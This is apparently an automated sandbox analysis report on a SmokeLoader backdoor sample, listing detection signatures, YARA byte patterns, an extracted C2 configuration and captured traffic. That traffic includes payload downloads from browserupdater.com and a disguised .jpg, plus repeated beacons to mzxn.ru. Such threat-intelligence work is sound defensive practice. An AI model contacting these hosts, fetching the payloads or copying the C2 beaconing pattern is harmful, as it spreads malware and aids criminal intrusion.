Windows Analysis Report
n72I7qB2ss.exe

Overview

General Information

Sample name: n72I7qB2ss.exe
renamed because original name is a hash value
Original sample name: 0a37ce10735d313ff079296125f25ee90a74fdb5aa87d9b5f1642998c62cf05e.exe
Analysis ID: 1488759
MD5: a3f7b743efab28654f201a43a0e349c5
SHA1: 58c7b963cbcdbf5837109e80693d77e32ac6d150
SHA256: 0a37ce10735d313ff079296125f25ee90a74fdb5aa87d9b5f1642998c62cf05e
Tags: exepst-innomi-net

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

  • System is w10x64
  • n72I7qB2ss.exe (PID: 6776 cmdline: "C:\Users\user\Desktop\n72I7qB2ss.exe" MD5: A3F7B743EFAB28654F201A43A0E349C5)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 70C1.exe (PID: 5820 cmdline: C:\Users\user\AppData\Local\Temp\70C1.exe MD5: 2B113C0906841F9AEAAFBD43C7CD37C4)
      • AA31.exe (PID: 5312 cmdline: C:\Users\user\AppData\Local\Temp\AA31.exe MD5: 85B1854B81D15AC9116AA200304D7CA0)
  • ashcvvs (PID: 2656 cmdline: C:\Users\user\AppData\Roaming\ashcvvs MD5: A3F7B743EFAB28654F201A43A0E349C5)
  • ashcvvs (PID: 3396 cmdline: C:\Users\user\AppData\Roaming\ashcvvs MD5: A3F7B743EFAB28654F201A43A0E349C5)
  • cleanup
Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution:
  • SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
Extracted configuration: {"Version": 2022, "C2 list": ["http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php", "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}
Source | Rule | Description | Author | Strings
00000005.00000002.2060795194.00000000006D0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | 0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1769088650.000000000065B000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x3a92:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1769015337.0000000000611000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |

      System Summary

      Source: Process started, Author: Max Altgelt (Nextron Systems), Data: Command: C:\Users\user\AppData\Roaming\ashcvvs, CommandLine: C:\Users\user\AppData\Roaming\ashcvvs, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ashcvvs, NewProcessName: C:\Users\user\AppData\Roaming\ashcvvs, OriginalFileName: C:\Users\user\AppData\Roaming\ashcvvs, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\ashcvvs, ProcessId: 2656, ProcessName: ashcvvs
      Timestamp | SID | Severity | Source Port | Destination Port | Protocol | Classtype
      2024-08-06T14:48:56.016106+0200 | 2039103 | 1 | 49752 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:48:30.928546+0200 | 2039103 | 1 | 49738 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:48:41.821298+0200 | 2039103 | 1 | 49744 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:51:34.618408+0200 | 2039103 | 1 | 49774 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:51:04.254415+0200 | 2039103 | 1 | 49768 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:50:20.438920+0200 | 2039103 | 1 | 49760 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:51:14.829048+0200 | 2039103 | 1 | 49770 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:48:37.059237+0200 | 2039103 | 1 | 49742 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:50:14.241484+0200 | 2039103 | 1 | 49759 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:48:35.534785+0200 | 2039103 | 1 | 49741 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:51:50.453126+0200 | 2039103 | 1 | 49777 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:48:39.509615+0200 | 2039103 | 1 | 49743 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:48:27.855659+0200 | 2039103 | 1 | 49736 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:50:41.269726+0200 | 2039103 | 1 | 49764 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:49:04.206062+0200 | 2039103 | 1 | 49756 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:48:50.165626+0200 | 2039103 | 1 | 49749 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:50:46.436979+0200 | 2039103 | 1 | 49765 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:51:45.563822+0200 | 2039103 | 1 | 49776 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:52:00.583525+0200 | 2039103 | 1 | 49779 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:50:59.094118+0200 | 2039103 | 1 | 49767 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:48:43.293459+0200 | 2039103 | 1 | 49745 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:51:55.337366+0200 | 2039103 | 1 | 49778 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:50:36.064848+0200 | 2039103 | 1 | 49763 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:51:29.791538+0200 | 2039103 | 1 | 49773 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:49:02.392745+0200 | 2039103 | 1 | 49755 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:50:25.754267+0200 | 2039103 | 1 | 49761 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:48:46.441446+0200 | 2039103 | 1 | 49747 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:50:30.907851+0200 | 2039103 | 1 | 49762 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:50:51.717674+0200 | 2039103 | 1 | 49766 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:48:29.414572+0200 | 2039103 | 1 | 49737 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:51:40.131887+0200 | 2039103 | 1 | 49775 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:48:33.946645+0200 | 2039103 | 1 | 49740 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:48:44.854879+0200 | 2039103 | 1 | 49746 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:51:19.867733+0200 | 2039103 | 1 | 49771 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:51:09.566965+0200 | 2039103 | 1 | 49769 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:51:24.926341+0200 | 2039103 | 1 | 49772 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:48:32.419301+0200 | 2039103 | 1 | 49739 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:48:48.380629+0200 | 2039103 | 1 | 49748 | 80 | TCP | A Network Trojan was detected
      2024-08-06T14:48:57.595341+0200 | 2039103 | 1 | 49753 | 80 | TCP | A Network Trojan was detected

      AV Detection

      Source: n72I7qB2ss.exe, Avira: detected
      Source: http://100xmargin.com/tmp/index.php, Avira URL Cloud: Label: malware
      Source: https://mussangroup.com/wp-content/images/pic5.jpg, Avira URL Cloud: Label: malware
      Source: http://mzxn.ru/tmp/index.php, Avira URL Cloud: Label: malware
      Source: C:\Users\user\AppData\Roaming\ashcvvs, Avira: detection malicious, Label: HEUR/AGEN.1318094
      Source: 00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php", "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}
      Source: C:\Users\user\AppData\Local\Temp\70C1.exe, ReversingLabs: Detection: 31%
      Source: C:\Users\user\AppData\Local\Temp\AA31.exe, ReversingLabs: Detection: 54%
      Source: C:\Users\user\AppData\Roaming\ashcvvs, ReversingLabs: Detection: 71%
      Source: n72I7qB2ss.exe, ReversingLabs: Detection: 71%
      Source: n72I7qB2ss.exe, Virustotal: Detection: 58%
      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Users\user\AppData\Roaming\ashcvvs, Joe Sandbox ML: detected
      Source: n72I7qB2ss.exe, Joe Sandbox ML: detected
      Source: n72I7qB2ss.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\n72I7qB2ss.exe, File opened: C:\Windows\SysWOW64\msvcr100.dll
      Source: unknown, HTTPS traffic detected: 45.130.41.250:443 -> 192.168.2.4:49751 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:49754 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49757 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49758 version: TLS 1.2
      Source: C:\Users\user\Desktop\n72I7qB2ss.exe, Code function: 0_2_0042379F GetLogicalDriveStringsW,DeleteVolumeMountPointW,GetCommandLineA,lstrcatW,InterlockedExchange,GetActiveWindow,GetSystemWindowsDirectoryW,WriteConsoleW,IntersectRect,FlushInstructionCache,GetAtomNameA,GlobalDeleteAtom,GetCurrentConsoleFont,SearchPathA,GetDefaultCommConfigA,DebugBreak,EnumDateFormatsW,SetCommMask,GetTickCount,GetSystemTimes,FoldStringW,OpenWaitableTimerA,HeapLock,FormatMessageW,GlobalAlloc,LoadLibraryA, 0_2_0042379F

      Networking

      Source: C:\Windows\explorer.exe, Network Connect: 45.130.41.250 443
      Source: C:\Windows\explorer.exe, Network Connect: 190.187.52.42 80
      Source: C:\Windows\explorer.exe, Network Connect: 58.151.148.90 80
      Source: C:\Windows\explorer.exe, Network Connect: 185.149.100.242 443
      Source: Malware configuration extractor, URLs: http://mzxn.ru/tmp/index.php
      Source: Malware configuration extractor, URLs: http://100xmargin.com/tmp/index.php
      Source: Malware configuration extractor, URLs: http://wgdnb4rc.xyz/tmp/index.php
      Source: Malware configuration extractor, URLs: http://olinsw.ws/tmp/index.php
      Source: Joe Sandbox View, IP Address: 190.187.52.42
      Source: Joe Sandbox View, IP Address: 188.114.97.3
      Source: Joe Sandbox View, ASN Name: BEGET-ASRU
      Source: Joe Sandbox View, ASN Name: AMERICATELPERUSAPE
      Source: Joe Sandbox View, ASN Name: POWERVIS-AS-KRLGPOWERCOMMKR
      Source: Joe Sandbox View, ASN Name: VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi
      Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: global traffic, HTTP traffic detected: GET /build.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: browserupdater.com
      Source: global traffic, HTTP traffic detected: GET /wp-content/images/pic5.jpg HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: mussangroup.com
      Source: global traffic, HTTP traffic detected: POST /dnbcompany_lt1jns?r8nly8r5hpamvqwa=wPH3ORWQpCff0Rbkjeq7BHUXYUTSjq2ZvEO74fzamCqz4bPud6wNFWcNcvb5H2uEbiUuLc8s9wrJ4LD3%2BwxZ6g%3D%3D HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 | Content-Length: 96 | Host: mundoparachicas.space
      Source: global traffic, HTTP traffic detected: POST /imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LOUvhvPrA9eFcs3uIBjr2ICTAiCiRSrnI1BD1Zngf6t0fTw%3D%3D HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 | Content-Length: 96 | Host: mundoparachicas.space
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lxtihacslghmp.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 278 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wbqhwxcwiokrti.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 281 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://yrcjsrfdprvic.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 302 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://knlbxirdtde.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 162 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nbynuqvcubp.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 154 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uvlrqtxncwdcr.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 369 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fwffjwnakkt.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 217 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hlaxjpgxxibka.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 344 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qxykcmjeqiqyjoi.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 265 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vqtbeoidrbmewm.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 278 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://sowqaemgjxhutlr.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 177 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qggmqqxdvbb.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 286 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://cypfufcosssb.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 246 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://asulighvhvx.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 334 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://typuxgfkyjirf.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 136 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://alapkefvafgo.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 135 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://yclxfxgmqbvjkhy.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 300 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kiaaagbssjkd.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 204 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://srhunmufdtubiva.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 248 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jmoobswoyynvmcc.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 208 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nepghogipjla.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 261 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pomgyqmowolnyuhi.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 364 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uxdwmdslnymyde.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 169 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://idvimpvmdkks.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 303 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bekxhhsmaopjub.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 293 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gjmkiqrlvkslwsem.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 339 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://mgctvlvgdog.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 270 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://keqkgetrekoo.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 118 | Host: mzxn.ru
      Source: global traffic, HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vqvtaxxtrjbp.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 229 | Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ovdrqgaphhsrkg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jgwoffhiempfd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://biwmwjkqpuwangh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ydamtofmlce.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yyvupavchggrcv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://doftqgthwcaw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nddnnutqhypaj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nmxuerpvqdsp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hmylssppqcui.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: mzxn.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://viiuigfvqxtv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: mzxn.ru
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic | HTTP traffic detected: GET /build.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: browserupdater.com
      Source: global traffic | HTTP traffic detected: GET /wp-content/images/pic5.jpg HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: mussangroup.com
      Source: global traffic | DNS traffic detected: DNS query: mzxn.ru
      Source: global traffic | DNS traffic detected: DNS query: browserupdater.com
      Source: global traffic | DNS traffic detected: DNS query: mussangroup.com
      Source: global traffic | DNS traffic detected: DNS query: mundoparachicas.space
